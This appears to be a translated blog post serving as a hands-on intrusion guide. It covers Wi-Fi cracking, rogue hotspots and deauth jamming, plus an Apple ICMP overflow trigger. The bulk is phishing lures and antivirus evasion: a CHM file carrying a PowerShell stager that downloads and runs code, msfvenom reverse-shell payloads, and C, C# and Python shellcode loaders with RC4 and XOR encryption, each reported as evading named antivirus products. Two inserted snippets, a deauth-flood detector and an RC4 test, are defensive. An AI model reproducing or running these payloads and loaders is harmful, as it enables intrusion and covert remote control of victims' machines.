Posted: 2021-01-15   Source: site admin   Author: 小乐
How Hackers Break Into Websites: Intrusion Techniques and Methods Explained (Part 2)
Near-source attacks

Wi-Fi cracking

wifite (Kali). Put the adapter into monitor mode first; wifite needs hcxtools v4.2.0 or later and hcxdumptool v4.2.0 or later:
    # airmon-ng check kill
    # airmon-ng start wlan1
    # apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
    # git clone https://github.com/ZerBea/hcxtools
    # cd hcxtools && make && make install
    # git clone https://github.com/ZerBea/hcxdumptool
    # cd hcxdumptool && make && make install
    # wifite --dict /root/Desktop/wordlist.txt

Aircrack-ng (the post mixes wlan0 and wlan1; use whichever adapter you actually put into monitor mode):
    # airmon-ng start wlan0                                  start monitor mode
    # airodump-ng wlan0mon                                   list APs and clients
    # airodump-ng -c 1 --bssid <AP MAC> -w name wlan1mon     capture one AP's traffic to name-01.cap
    # aireplay-ng --deauth 10 -a <AP MAC> wlan0mon           broadcast deauthentication
    # aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
                                                             deauth one client until the WPA handshake is captured
    # airmon-ng stop wlan0mon                                stop monitor mode
    # aircrack-ng -w wordlist.txt name.cap                   dictionary attack on the handshake

Rogue ("phishing") network with hostapd
    # apt install hostapd dnsmasq
    # cd /etc/hostapd
    # vim open.conf        an open, unencrypted hotspot (hostapd keys are lowercase; the capitalised Interface=/Ssid= in the original would be rejected):
        interface=wlan1
        ssid=FreeWIFI
        driver=nl80211
        channel=1
        hw_mode=g
    # vim /etc/dnsmasq.conf
        dhcp-range=10.0.0.2,10.0.0.254,12h
        interface=wlan1
    # systemctl restart dnsmasq
(The original range 10.0.0.1,10.0.0.255 hands out the AP's own address and the broadcast address; start at .2 and stop at .254.)
Release the adapter from NetworkManager and rfkill, give it the gateway address, and start the AP:
    # nmcli radio wifi off
    # rfkill unblock wlan
    # ifconfig wlan1 10.0.0.1/24
    # hostapd open.conf
Sniffing clients of the rogue AP: forward their traffic to the uplink, then capture on wlan1:
    # sysctl -w net.ipv4.ip_forward=1
    # iptables -t nat -A POSTROUTING -o <uplink interface> -j MASQUERADE
    # bettercap -iface wlan1
      » net.show
      » net.sniff on
    # driftnet -i wlan1

hostapd-wpe (capturing enterprise credentials)
    # apt install hostapd-wpe
    # vim /etc/hostapd-wpe/hostapd-wpe.conf    set interface=wlan1, ssid=, channel=
Certificates: edit ca.cnf, server.cnf and client.cnf in /etc/hostapd-wpe/certs/ (countryName, stateOrProvinceName, localityName, ...) and regenerate:
    # cd /etc/hostapd-wpe/certs/
    # rm -rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*
    # make clean
    # ./bootstrap
    # make install
Start the hotspot:
    # hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
When a client authenticates, crack the logged MSCHAPv2 challenge/response with asleap:
    # asleap -C <challenge> -R <response> -W <wordlist>

Wireless jamming
Beacon flood (adapter in monitor mode): create a large number of fake hotspots with SSIDs read from a file
    # airmon-ng start wlan1
    # mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500
Deauth flood against an AP
    # airmon-ng start wlan1
    # aireplay-ng --deauth 10 -a <AP MAC> mon0
Deauth flood against a client of an AP (-0 0 keeps sending until interrupted; -a is the AP's BSSID, -c the client's MAC, not the AP's as the original wrote)
    # airmon-ng start wlan1
    # airodump-ng wlan1mon --bssid <AP MAC>
    # aireplay-ng -0 0 -a <AP MAC> -c <client MAC> wlan0mon
mdk3 deauth/disassoc "amok" mode against everything in range
    # mdk3 wlan1mon d
mdk3 authentication DoS against one AP
    # airodump-ng wlan1mon
    # mdk3 wlan1mon a -a <AP MAC>
Blacklist (only hit the BSSIDs/clients listed in the file, on one channel)
    # mdk3 wlan1mon d -c <channel> -b /blacklist.txt
    # mdk3 wlan1mon b -n test -w -g -c 1 -s 200
ESP8266 (Wi-Fi chip): the same deauth attacks from a standalone microcontroller.
mdk4
    # mdk4 wlan0mon d

CVE-2018-4407 (Apple XNU ICMP buffer overflow), trigger with Scapy:
    send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
Affected: Apple iOS 11 and earlier, all devices (and some devices upgraded to iOS 12); macOS High Sierra up to 10.13.6, all devices (fixed in Security Update 2018-001); macOS Sierra up to 10.12.6, all devices (fixed in Security Update 2018-005); OS X El Capitan and earlier, all devices.

Bypassing MAC address authentication
ifconfig:
    # ifconfig wlan1 down
    # ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx
    # ifconfig wlan1 up
macchanger:
    # macchanger -m xx:xx:xx:xx:xx:xx wlan1     set a specific MAC
    # macchanger -r wlan1                      random MAC

BadUSB
Card cloning
Bluetooth

Spear phishing

Phishing e-mail: spoofed internal domain; spoofed external domain; look-alike domain; compromised account. Mass mailing or targeted sending. A fabricated pretext, a malicious link, or a malicious attachment.

CVEs commonly used in lures:
CVE-2017-11882: Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016
CVE-2017-0199: Microsoft Office 2007 SP3 / 2010 SP2 / 2013 SP1 / 2016; Windows Vista SP2; Server 2008 SP2; Windows 7 SP1; Windows 8.1
CVE-2012-0158: Microsoft Office 2003 SP3, 2007 SP2 and SP3, 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, 2008 SP2, SP3 and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; Visual Basic 6.0
CVE-2017-0143 (an SMBv1 bug, not a document-format bug): Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; Windows 10 Gold, 1511 and 1607; Windows Server 2016
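What the deauthentication floods above look like from the defender's side, as an added example that is not part of the original post: every frame aireplay-ng or mdk3 sends is a management frame with type 0 / subtype 12, so a monitor-mode capture can be triaged by parsing the frame-control field and counting deauth frames per BSSID per second. The AP and client MACs are the ones from the aireplay-ng line above; the capture itself, the one-second window and the threshold of 10 frames are constructed and chosen for this example.

```python
"""Spot an aireplay-ng / mdk3 style deauthentication flood in raw 802.11 frames."""
import struct
from collections import Counter, defaultdict

MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(buf):
    """Parse the 24-byte 802.11 MAC header of a management frame.

    Returns type/subtype, the three addresses and, for disassoc/deauth frames,
    the reason code. Anything shorter than a full header is rejected so a
    truncated capture cannot raise inside the flood detector.
    """
    if len(buf) < 24:
        return None
    fc, _duration = struct.unpack_from("<HH", buf, 0)
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    frame = {
        "type": ftype,
        "subtype": subtype,
        "addr1": mac_str(buf[4:10]),   # destination: a client, or ff:ff:ff:ff:ff:ff for broadcast
        "addr2": mac_str(buf[10:16]),  # source: the AP address, spoofed by the attacker
        "addr3": mac_str(buf[16:22]),  # BSSID
        "reason": None,
    }
    if ftype == MGMT and subtype in (10, 12) and len(buf) >= 26:
        frame["reason"] = struct.unpack_from("<H", buf, 24)[0]
    return frame


def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_bytes).

    Returns {bssid: peak deauth frames in any window} for BSSIDs over the
    threshold. A healthy AP sends a handful of deauths a minute; tens per
    second from one BSSID is a flood.
    """
    per_bucket = defaultdict(Counter)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f is None or f["type"] != MGMT or f["subtype"] != SUBTYPE_DEAUTH:
            continue
        per_bucket[int(ts // window)][f["addr3"]] += 1
    peak = Counter()
    for bucket in per_bucket.values():
        for bssid, n in bucket.items():
            peak[bssid] = max(peak[bssid], n)
    return {b: n for b, n in peak.items() if n > threshold}


def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build a minimal management frame (constructed test data, not a capture)."""
    fc = (subtype << 4) | (MGMT << 2)          # protocol version 0, flags 0
    header = struct.pack("<HH", fc, 0) + dst + src + bssid + struct.pack("<H", 0)
    return header + body


AP = bytes.fromhex("c83a35303ec8")       # AP MAC from the post's aireplay-ng line
CLIENT = bytes.fromhex("b8e85609cc9c")   # client MAC from the same line
BCAST = b"\xff" * 6
REASON_CLASS3 = struct.pack("<H", 7)     # reason code 7, the value aireplay-ng --deauth uses


def sample_capture():
    """Constructed: a beacon every 100 ms for 5 s, plus a 40-frame deauth burst at t=2 s."""
    frames = [(t / 10, build_mgmt_frame(SUBTYPE_BEACON, BCAST, AP, AP)) for t in range(50)]
    for i in range(40):
        dst = BCAST if i % 2 == 0 else CLIENT
        frames.append((2.0 + i * 0.01, build_mgmt_frame(SUBTYPE_DEAUTH, dst, AP, AP, REASON_CLASS3)))
    return frames


if __name__ == "__main__":
    print(detect_deauth_flood(sample_capture()))
```

With a real capture, feed it (timestamp, frame) pairs from your pcap reader; an AP that also reaches the threshold during normal operation is a sign the window or threshold needs tuning for that environment, not of an attack.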
Office documents / PDF files; executables

Forged document files: extension and icon tricks, bundling, macros, 0-days, CHM.

CHM
A compiled HTML file can carry the loader: write the code into an HTML page and compile it with EasyCHM.
Generate the PowerShell stager with MSF's web_delivery module and run it through rundll32 with MyJSRat so that no window appears. Base64-encode the command so no special characters have to survive quoting; the encoded command is
    > powershell -ep bypass -enc JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA==
(-enc is base64 of the UTF-16LE script, not encryption: this blob is the standard web_delivery stager that fetches http://192.168.0.107:8080/PKQNEb through the system proxy and runs it with IEX.)
Serve the PowerShell call-back through JSRat (https://github.com/Ridter/MyJSRat):
    > python MyJSRat.py -i 192.168.1.107 -p 8888 -c "powershell -ep bypass -enc ..."
Open http://<ip>/wtf, copy the launcher statement into the HTML file and compile it. Opening the CHM normally yields a session with no visible window.

Phishing links
URL redirects; combined with a malicious document or program; short URLs; combined with a watering-hole attack; look-alike domains; domain hijacking; spear phishing through third-party services; building a relationship over social apps first (partner, mentor and apprentice, HR, a business inquiry) and then sending the lure.

AV evasion

MSF evasion

nps_payload
    > python nps_payload.py                     generate the payload
    > msfconsole -r msbuild_nps.rc              start the listener
    > %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe xx.xml
    > wmiexec.py ...
Launching it this way works, but the session dies when the msbuild process ends, so save the following as a .bat and run that instead, then migrate as soon as the session arrives:
    @echo off
    echo [*] Please Wait, preparing software ..
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\xxx.xml
    exit

Stage encoders
    > set EnableStageEncoding true
    > set stageencoder x86/fnstenv_mov          encode the stage for evasion
    > set stageencodingfallback false
    > msfvenom --list encoders                  list the available encoders

C/C++ source
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f c -o 1.c
(-i 20 encodes 20 times.) On the MSF listener set automatic process migration: set autorunscript migrate -n explorer.exe

Function-pointer call:
    #pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")  // no console window
    unsigned char buf[] = "shellcode";
    int main(void)
    {
        ((void (*)(void))&buf)();   // jump straight into the .data array
        return 0;
    }
Build with VC 6.0 and run on the target. Currently caught by Huorong; passes 360's static and dynamic checks. This only runs because a VC 6.0 binary is not DEP-aware and its .data section stays executable; the inline-assembly variants below mark .data RWE explicitly for the same reason.

Dynamically allocated memory:
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>
    #pragma comment(linker, "/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")  // no console window
    unsigned char buf[] = "shellcode";
    int main(void)
    {
        char *Memory;
        // RWX page, copy the buffer in, call it
        Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(Memory, buf, sizeof(buf));
        ((void (*)(void))Memory)();
        return 0;
    }

Inline assembly:
    #include <windows.h>
    #include <stdio.h>
    #pragma comment(linker, "/section:.data,RWE")   // make .data executable
    unsigned char shellcode[] = "";
    void main(void)
    {
        __asm {
            mov eax, offset shellcode
            jmp eax
        }
    }

Forced cast:
    #include <windows.h>
    #include <stdio.h>
    unsigned char buf[] = "";
    void main(void)
    {
        ((void (WINAPI *)(void))&buf)();
    }

Junk assembly:
    #include <windows.h>
    #include <stdio.h>
    #pragma comment(linker, "/section:.data,RWE")
    unsigned char shellcode[] = "";
    void main(void)
    {
        __asm {
            mov eax, offset shellcode
            _emit 0xFF    // FF E0 is "jmp eax", emitted byte by byte so the
            _emit 0xE0    // obvious instruction never appears in the source
        }
    }

XOR encryption
Install https://github.com/Arno0x/ShellcodeWrapper. Generate a raw payload:
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f raw -o shell.raw
Encrypt:
    > python shellcode_encoder.py -cpp -cs -py shell.raw thisiskey xor
Compile the generated .py with py2exe, the .cs with csc.exe, and the .cpp with VC 6.0 (remove the precompiled header first).

Remote thread injection
Currently passes Huorong but not 360; combine it with another technique. In Visual Studio create a C++ console project, set Properties > Use of MFC > "Use MFC in a Static Library", paste the C-format shellcode into remote inject.cpp and build. The result gets a session and spawns a calc process.

Loader-based evasion

shellcode_launcher (https://github.com/clinicallyinane/shellcode_launcher/)
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f raw -o shellcode.raw
    > shellcode_launcher.exe -i shellcode.raw

SSI (https://github.com/DimopoulosElias/SimpleShellcodeInjector)
    > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f c -o shellcode.c
Turn the C array into one continuous hex string:
    > cat shellcode.c | grep -v unsigned | sed "s/\"\\\x//g" | sed "s/\\\x//g" | sed "s/\"//g" | sed ':a;N;$!ba;s/\n//g' | sed "s/;//g"
Start the MSF listener, build the injector with MinGW, and pass the hex string as the argument:
    > gcc SimpleShellcodeInjector.c -o xxx.exe
    > xxx.exe <hex string>

C# source

Direct compile
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Start the MSF listener (autorunscript migrate -n explorer.exe) and paste the payload into the array:
    using System;
    using System.Runtime.InteropServices;

    namespace TCPMeterpreterProcess
    {
        class Program
        {
            static void Main(string[] args)
            {
                byte[] shellcode = new byte[] { /* payload here */ };
                // RWX allocation; the UInt32 addresses make this an x86-only build
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                IntPtr hThread = IntPtr.Zero;
                UInt32 threadId = 0;
                IntPtr pinfo = IntPtr.Zero;
                // run the buffer on a new thread and wait for it
                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }

            private static UInt32 MEM_COMMIT = 0x1000;
            private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

            [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
            [DllImport("kernel32")]
            private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
            [DllImport("kernel32")]
            private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
            [DllImport("kernel32")]
            private static extern bool CloseHandle(IntPtr handle);
            [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
            [DllImport("kernel32")]
            private static extern IntPtr GetModuleHandle(string moduleName);
            [DllImport("kernel32")]
            private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);
            [DllImport("kernel32")]
            private static extern UInt32 LoadLibrary(string lpFileName);
            [DllImport("kernel32")]
            private static extern UInt32 GetLastError();
        }
    }
Create a C# .NET Framework console project in Visual Studio, paste, compile; the result passes AV.

Encrypted payload
Same msfvenom command (csharp output), listener with autorunscript migrate. Paste the payload into the encryptor, compile and run it; it prints the RC4-encrypted bytes as a comma-separated decimal list:
    using System;
    using System.Collections.Generic;
    using System.Linq;

    namespace Payload_Encrypt_Maker
    {
        class Program
        {
            // Encryption key; change freely, but keep it identical in the decryptor
            static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00,
                                  0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
            static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };   // unused: RC4 has no IV
            static byte[] payload = { /* payload here: the msfvenom csharp output */ };

            // Plain RC4: key scheduling (EncryptInitalize) then keystream XOR (EncryptOutput)
            private static class Encryption_Class
            {
                public static byte[] Encrypt(byte[] key, byte[] data)
                {
                    return EncryptOutput(key, data).ToArray();
                }

                private static byte[] EncryptInitalize(byte[] key)
                {
                    byte[] s = Enumerable.Range(0, 256).Select(i => (byte)i).ToArray();
                    for (int i = 0, j = 0; i < 256; i++)
                    {
                        j = (j + key[i % key.Length] + s[i]) & 255;
                        Swap(s, i, j);
                    }
                    return s;
                }

                private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
                {
                    byte[] s = EncryptInitalize(key);
                    int i = 0;
                    int j = 0;
                    return data.Select((b) =>
                    {
                        i = (i + 1) & 255;
                        j = (j + s[i]) & 255;
                        Swap(s, i, j);
                        return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                    });
                }

                private static void Swap(byte[] s, int i, int j)
                {
                    byte c = s[i];
                    s[i] = s[j];
                    s[j] = c;
                }
            }

            static void Main(string[] args)
            {
                byte[] result = Encryption_Class.Encrypt(KEY, payload);
                // "1,2,3" with no trailing comma: the original loop always printed a
                // comma after the last byte, so the loader's Split(',') produced an
                // empty field and Convert.ToByte("") threw a FormatException
                Console.Write(string.Join(",", result));
            }
        }
    }

Decryptor / loader; paste the printed list into Payload_Encrypted and compile:
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Runtime.InteropServices;
    using System.Threading;

    namespace NativePayload_Reverse_tcp
    {
        public class Program
        {
            public static void Main()
            {
                Shellcode.Exec();
            }
        }

        class Shellcode
        {
            public static void Exec()
            {
                // the comma-separated decimal list printed by the encryptor
                string Payload_Encrypted = "payload here";
                string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
                byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
                for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
                {
                    _X_to_Bytes[i] = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i]);
                }

                // Decryption key; must match the encryptor's KEY
                byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00,
                               0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
                byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);

                // RWX allocation, copy, run on a new thread
                IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
                Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
                CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
                // the process exits after two seconds; the handler's migrate autorunscript
                // has to have moved the session out by then
                Thread.Sleep(2000);
            }

            public static byte[] Decrypt(byte[] key, byte[] data)
            {
                return EncryptOutput(key, data).ToArray();   // RC4 is symmetric
            }

            private static byte[] EncryptInitalize(byte[] key)
            {
                byte[] s = Enumerable.Range(0, 256).Select(i => (byte)i).ToArray();
                for (int i = 0, j = 0; i < 256; i++)
                {
                    j = (j + key[i % key.Length] + s[i]) & 255;
                    Swap(s, i, j);
                }
                return s;
            }

            private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
            {
                byte[] s = EncryptInitalize(key);
                int i = 0;
                int j = 0;
                return data.Select((b) =>
                {
                    i = (i + 1) & 255;
                    j = (j + s[i]) & 255;
                    Swap(s, i, j);
                    return (byte)(b ^ s[(s[i] + s[j]) & 255]);
                });
            }

            private static void Swap(byte[] s, int i, int j)
            {
                byte c = s[i];
                s[i] = s[j];
                s[j] = c;
            }

            [DllImport("kernel32.dll")]
            public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
            [DllImport("kernel32.dll")]
            public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        }
    }

XOR/AES encoding: same approach as the XOR wrapper above.

CSC + InstallUtil
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
Listener with autorunscript migrate. Paste the payload into InstallUtil-Shellcode.cs and compile it with csc:
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs
Run it through InstallUtil's uninstall path:
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe

Python source

pyinstaller with C shellcode
    > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Listener with autorunscript migrate. Paste the shellcode into shellcode+c.py. On a 32-bit system install Python, py2exe and pyinstaller, then from C:\Python27\Scripts:
    > python pyinstaller-script.py -F -w shellcode.py
The exe is in the dist folder it creates.

pyinstaller with a Python payload (*)
    > msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py
Paste into shellcode+py.py, same setup:
    > python pyinstaller-script.py --console --onefile shellcode.py
The exe is in the dist folder.

py2exe
    > msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
On a 32-bit system install Python and py2exe, and put setup.py next to shell.py:
    from distutils.core import setup
    import py2exe

    setup(
        name="Meter",
        description="Python-based App",
        version="1.0",
        console=["shell.py"],
        options={"py2exe": {"bundle_files": 1,
                            "packages": "ctypes",
                            "includes": "base64,sys,socket,struct,time,code,platform,getpass,shutil"}},
        zipfile=None,
    )
Build:
    > python setup.py py2exe
The exe is in the dist folder.

Base64 + pyinstaller
    > msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c
Paste the shellcode into shellcode+base64+c.py and build:
    > python pyinstaller-script.py -F -w shellcode.py

Separating loader and payload

hex
    > msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
Download k8final, paste the shellcode in, and run it with https://github.com/k8gege/scrun:
    > python scrun.py <hex shellcode>
or compile ScRunHex.py to an exe.

Base64 (*)
Same msfvenom command. Paste the shellcode into k8final, hex-encode it, then base64-encode the result. Build ScRunBase64.py (https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py) for the target's bitness with pyinstaller and run it:
    > python pyinstaller-script.py -F -w ScRunBase64.py

DLL hijacking
"White" DLL hijacking: use Process Monitor to find the DLLs a trusted program loads, then either add the DLL with stud_pe or paste an already-evaded payload into a DLL of that name. Check which software is installed on the target, find a hijackable DLL for it locally, prepare the file, and upload it.
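A check on the C# Payload_Encrypt_Maker / NativePayload_Reverse_tcp pair above, as an added example that is not code from the post: EncryptInitalize and EncryptOutput are plain RC4 (key scheduling, then keystream XOR), so the same routine written in Python can be tested against the published RC4 vector (key "Key", plaintext "Plaintext"), and the comma-separated decimal list the encryptor prints can be produced and parsed without the trailing comma that makes the loader's Convert.ToByte("") throw. KEY is the 23-byte key from the post; the sample bytes are constructed.

```python
"""RC4 round trip and the decimal-list format used by the C# encryptor/loader pair."""


def rc4_ksa(key):
    """Key scheduling: the same loop as the C# EncryptInitalize."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + key[i % len(key)] + s[i]) & 255
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key, data):
    """Keystream XOR (the C# EncryptOutput); RC4 is symmetric, so this both encrypts and decrypts."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for b in data:
        i = (i + 1) & 255
        j = (j + s[i]) & 255
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 255])
    return bytes(out)


def to_decimal_list(data):
    """Format the way the C# Main should: '1,2,3' with no trailing comma."""
    return ",".join(str(b) for b in data)


def from_decimal_list(text):
    """Inverse of the loader's Split(',') + Convert.ToByte loop.

    Rejects empty fields explicitly: a trailing comma is exactly the input on
    which the C# loader dies with a FormatException.
    """
    fields = text.split(",")
    if any(f == "" for f in fields):
        raise ValueError("empty field: a trailing comma would break Convert.ToByte")
    return bytes(int(f) for f in fields)


def has_trailing_comma(text):
    return text.endswith(",")


# The 23-byte key from the post's C# (the IV there is unused: RC4 has none).
KEY = bytes([0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00,
             0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00])


def roundtrip(payload, key=KEY):
    """Encrypt, emit the list the loader expects, parse it back, decrypt."""
    encoded = to_decimal_list(rc4_crypt(key, payload))
    return rc4_crypt(key, from_decimal_list(encoded))


if __name__ == "__main__":
    # Published RC4 vector: key "Key", plaintext "Plaintext" -> bbf316e8d940af0ad3
    print(rc4_crypt(b"Key", b"Plaintext").hex())
    sample = b"constructed sample bytes"   # stand-in for the msfvenom output
    print(roundtrip(sample) == sample)
```

If the hex printed for the test vector does not match, the KSA or PRGA has drifted from RC4 and the C# loader would decrypt garbage and crash in the new thread rather than fail loudly, which is the failure mode that is hardest to debug from the handler side.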
MSBuild
Inline-task XML: https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
    > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f csharp
Execute remotely with wmiexec.py; set automatic process migration on the listener.

GreatSCT
    > use Bypass
    > list
    > use regasm/meterpreter/rev_tcp.py
    > msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

Mshta
CACTUSTORCH: https://github.com/mdsecactivebreach/CACTUSTORCH/blob/master/CACTUSTORCH.hta
    > msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/1.bin
    > cat 1.bin | base64 -w 0
Paste the base64 output into the .hta and run it:
    > mshta http://192.168.0.106:1222/1.hta
360 flags it at execution but not in its static or dynamic file scans; Huorong does not detect it.

InstallUtil: covered in the internal-network article.

Veil
    > use 1            select the evasion module
    > list             list the available payloads
    > use 7            the C-format payload
    > set LHOST / set LPORT
    > generate
The exe Veil produces directly may be detected (currently passes 360, not Huorong), so compile the C file yourself with MinGW-w64:
    > gcc -o vel.exe veil.c -l ws2_32

RC4 transport
    > msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 lhost=192.168.0.108 lport=3333 RC4PASSWORD=123qwe!@# -f c

Bundling with a template
    > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -x PsExec64.exe -i 15 -f exe -o /var/www/html/payload4.exe
(The -x template must match the payload's architecture: PsExec64.exe is 64-bit, so pair it with windows/x64/meterpreter/reverse_tcp, or use the 32-bit PsExec.exe with this payload.)

Evasion modules
    > show evasion

Phantom-Evasion

Shellter
Only supports 32-bit programs.
    > apt install shellter
Point it at an exe file, then choose the payload.

the-backdoor-factory
Check whether a file can be backdoored, and which payloads it supports:
    > python backdoor.py -f /root/Desktop/putty.exe -S
    > python backdoor.py -f /root/Desktop/putty.exe -s show
reverse_shell_tcp_inline corresponds to msf set payload windows/meterpreter/reverse_tcp
